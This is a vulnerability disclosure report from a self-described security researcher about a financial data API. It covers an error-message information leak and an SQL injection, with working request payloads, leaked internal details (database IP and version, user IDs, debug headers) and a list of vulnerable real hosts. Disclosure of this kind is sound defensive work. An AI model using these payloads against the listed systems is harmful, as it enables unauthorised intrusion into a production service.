Hi, I'm a security researcher!
I found vulnerabilities in your websites.
Here is my report about the bugs:
# Information leak via error message
Payload:
```
send: {"type":0,"data":["d|2",[[0,{"search":{"service":"security.__proto\u0000__","source":"SW","param":{"searchString":"wirtualna","quoteFilter":"COMPLETE","limit":25,"notExchangeId":[1006,1034],"securityGroupOrder":1,"searchArbitrageLogic":0,"searchExactInstrumentKey":1,"searchExactArbitrage":1,"searchSubstring":1,"searchFuzzy":1,"isHomeExchange":true,"languageIsoalpha2":"EN"}},"options":{"language":"EN"}}]]]}
send: {"type":0,"data":["e|2",null]}
recv: {"type":0,"data":["d|2",[[{"type":"PROGRAMMER_ERROR","code":500,"name":500,"message":"500 => {\"stack\":\"HTTPError: Response code 500 (Internal Server Error)\\n at EventEmitter.<anonymous> (/supervise/finance-api-3-server-3/node_modules/got/source/as-promise.js:74:19)\\n at runMicrotasks (<anonymous>)\\n at processTicksAndRejections (internal/process/task_queues.js:97:5)\",\"body\":\"Error(Error): A problem has occurred.\\n--------------------------------------------------------------------------------\\n\\nThe page that you requested is currently unavailable.\\n\\n- Press refresh or try again later.\\n\\n- In the case that you entered the requested URL manually please make \\n sure that the URL was entered correctly.\\n\\n- Press the \\\"back\\\" button off your browser in order to follow a different link.\\n\\n--------------------------------------------------------------------------------\\n\",\"code\":500,\"curl\":\"curl -ksS -H 'x-usfdebugsql: 1' -H 'x-usfpurge: 0' --data-raw 'version=1&source=SW&service=security.__proto%00__&auth=%7B%22moduleDirectoryName%22%3A%22DEGIRO%22%2C%22customerId%22%3A8149%2C%22userId%22%3A8520253%2C%22_userId%22%3A8520253%2C%22languageIsoalpha2%22%3A%22NL%22%2C%22vwdId%22%3Anull%2C%22pool%22%3Anull%7D&param=%7B%22searchString%22%3A%22wirtualna%22%2C%22quoteFilter%22%3A%22COMPLETE%22%2C%22limit%22%3A25%2C%22notExchangeId%22%3A%5B1006%2C1034%5D%2C%22securityGroupOrder%22%3A1%2C%22searchArbitrageLogic%22%3A0%2C%22searchExactInstrumentKey%22%3A1%2C%22searchExactArbitrage%22%3A1%2C%22searchSubstring%22%3A1%2C%22searchFuzzy%22%3A1%2C%22isHomeExchange%22%3A1%7D&fields=&languageIsoalpha2=EN' 'http://fapiv3.vwd-webtech.com:80/global/api/api.htn'\",\"headers\":{\"date\":\"Sun, 16 Aug 2020 18:45:40 GMT\",\"server\":\"Apache\",\"expires\":\"Sun, 16 Aug 2020 18:45:45 GMT\",\"vary\":\"Accept-Encoding,X-USF-Cookie\",\"x-powered-by\":\"USF-10/27/082/6\",\"x-usf-error\":\"Error\",\"cache-control\":\"max-age=5\",\"content-length\":\"489\",\"last-modified\":\"Sun, 16 Aug 2020 18:45:40 GMT\",\"content-type\":\"text/plain; charset=UTF-8\"},\"message\":\"Internal Server Error\"}","stackTrace":"500: 500 => {\"stack\":\"HTTPError: Response code 500 (Internal Server Error)\\n at EventEmitter.<anonymous> (/supervise/finance-api-3-server-3/node_modules/got/source/as-promise.js:74:19)\\n at runMicrotasks (<anonymous>)\\n at processTicksAndRejections (internal/process/task_queues.js:97:5)\",\"body\":\"Error(Error): A problem has occurred.\\n--------------------------------------------------------------------------------\\n\\nThe page that you requested is currently unavailable.\\n\\n- Press refresh or try again later.\\n\\n- In the case that you entered the requested URL manually please make \\n sure that the URL was entered correctly.\\n\\n- Press the \\\"back\\\" button off your browser in order to follow a different link.\\n\\n--------------------------------------------------------------------------------\\n\",\"code\":500,\"curl\":\"curl -ksS -H 'x-usfdebugsql: 1' -H 'x-usfpurge: 0' --data-raw 'version=1&source=SW&service=security.__proto%00__&auth=%7B%22moduleDirectoryName%22%3A%22DEGIRO%22%2C%22customerId%22%3A8149%2C%22userId%22%3A8520253%2C%22_userId%22%3A8520253%2C%22languageIsoalpha2%22%3A%22NL%22%2C%22vwdId%22%3Anull%2C%22pool%22%3Anull%7D&param=%7B%22searchString%22%3A%22wirtualna%22%2C%22quoteFilter%22%3A%22COMPLETE%22%2C%22limit%22%3A25%2C%22notExchangeId%22%3A%5B1006%2C1034%5D%2C%22securityGroupOrder%22%3A1%2C%22searchArbitrageLogic%22%3A0%2C%22searchExactInstrumentKey%22%3A1%2C%22searchExactArbitrage%22%3A1%2C%22searchSubstring%22%3A1%2C%22searchFuzzy%22%3A1%2C%22isHomeExchange%22%3A1%7D&fields=&languageIsoalpha2=EN' 'http://fapiv3.vwd-webtech.com:80/global/api/api.htn'\",\"headers\":{\"date\":\"Sun, 16 Aug 2020 18:45:40 GMT\",\"server\":\"Apache\",\"expires\":\"Sun, 16 Aug 2020 18:45:45 GMT\",\"vary\":\"Accept-Encoding,X-USF-Cookie\",\"x-powered-by\":\"USF-10/27/082/6\",\"x-usf-error\":\"Error\",\"cache-control\":\"max-age=5\",\"content-length\":\"489\",\"last-modified\":\"Sun, 16 Aug 2020 18:45:40 GMT\",\"content-type\":\"text/plain; charset=UTF-8\"},\"message\":\"Internal Server Error\"}\n at doHttp (/supervise/finance-api-3-server-3/node_modules/@vwd/finance-api-server/lib/handler/common/http.js:98:11)\n at runMicrotasks (<anonymous>)\n at processTicksAndRejections (internal/process/task_queues.js:97:5)"}]]]}
recv: {"type":0,"data":["e|2",null]}
```
In the error message I can see how to use the 'internal API' with debug headers:
```
curl -ksS -H 'x-usfdebugsql: 1' -H 'x-usfpurge: 0' --data-raw '<payload>' http://fapiv3.vwd-webtech.com:80/global/api/api.htn
```
Vulnerable hosts:
- http://128.127.11.37:80/primus
# SQL injection
Payload:
```
curl -i 'http://128.127.11.68:80/global/api/api.htn' -X POST \
-H 'X-USFDEBUGMEMCACHED: 1' \
-H 'X-USFDEBUGPARAM: 1' \
-H 'X-USFDEBUGOBJECTSQL: 1' \
-H 'X-USFDEBUGSQL: 1' \
--data-raw 'version=1&source=SW&service=security.search&auth=%7B%22moduleDirectoryName%22%3A+%22%22%2C+%22customerId%22%3A+0%2C+%22userId%22%3A+0%2C+%22_userId%22%3A+%221%22%2C+%22languageIsoalpha2%22%3A+%22NL%22%2C+%22vwdId%22%3A+null%2C+%22pool%22%3A+null%7D&param=%7B%22addCumulativeTurnover%22%3A+%220%22%2C+%22addVolume%22%3A+%221%22%2C+%22dateEnd%22%3A+%222020-08-13T23%3A59%3A59%22%2C+%22dateFormat%22%3A+%22UNIXTIME%22%2C+%22dateStart%22%3A+%222020-08-13T000000%22%2C+%22flatTableName%22%3A+%22shareSearch%22%2C+%22flatTableType%22%3A+%22INSTRUMENT%22%2C+%22instrumentId%22%3A+%2210555466%22%2C+%22intradayType%22%3A+%22LAST%22%2C+%22isin%22%3A+%22GB00BFZ45C84%22%2C+%22objectSQLObject%22%3A+%22USF2%3A%3ADATA%3A%3ASQL%22%2C+%22prefix%22%3A+%22%3Chere+sqlinjection%3E%23%22%2C+%22quoteType%22%3A+%22OHLC%22%2C+%22securityCategoryCode%22%3A+%22SHARE%22%2C+%22service%22%3A+%22security_slave%22%2C+%22timeAggregation%22%3A+%22daily%22%2C+%22widthAggregation%22%3A+%220%22%7D&fields=&languageIsoalpha2=EN'
```
I just leaked a small amount of info and then I stopped.
Leaked info from the SQL injection:
* MySQL IP - `10.10.10.176`
* MySQL version - `5.6.46-86.2-log`
Also, `debug headers` should be *disabled* or available only from the *internal network*.
Vulnerable hosts:
- http://128.127.11.40:80/global/api/api.htn
- http://128.127.11.41:80/global/api/api.htn
- http://128.127.11.43:80/global/api/api.htn
- http://128.127.11.45:80/global/api/api.htn
- http://128.127.11.46:80/global/api/api.htn
- http://128.127.11.47:80/global/api/api.htn
- http://128.127.11.51:80/global/api/api.htn
- http://128.127.11.52:80/global/api/api.htn
- http://128.127.11.55:80/global/api/api.htn
- http://128.127.11.56:80/global/api/api.htn
- http://128.127.11.59:80/global/api/api.htn
- http://128.127.11.60:80/global/api/api.htn
- http://128.127.11.62:80/global/api/api.htn
- http://128.127.11.63:80/global/api/api.htn
- http://128.127.11.64:80/global/api/api.htn
- http://128.127.11.65:80/global/api/api.htn
- http://128.127.11.67:80/global/api/api.htn
- http://128.127.11.68:80/global/api/api.htn
- http://128.127.11.69:80/global/api/api.htn
- http://128.127.11.70:80/global/api/api.htn
- http://128.127.11.73:80/global/api/api.htn
- http://128.127.11.82:80/global/api/api.htn
- http://128.127.8.30:80/global/api/api.htn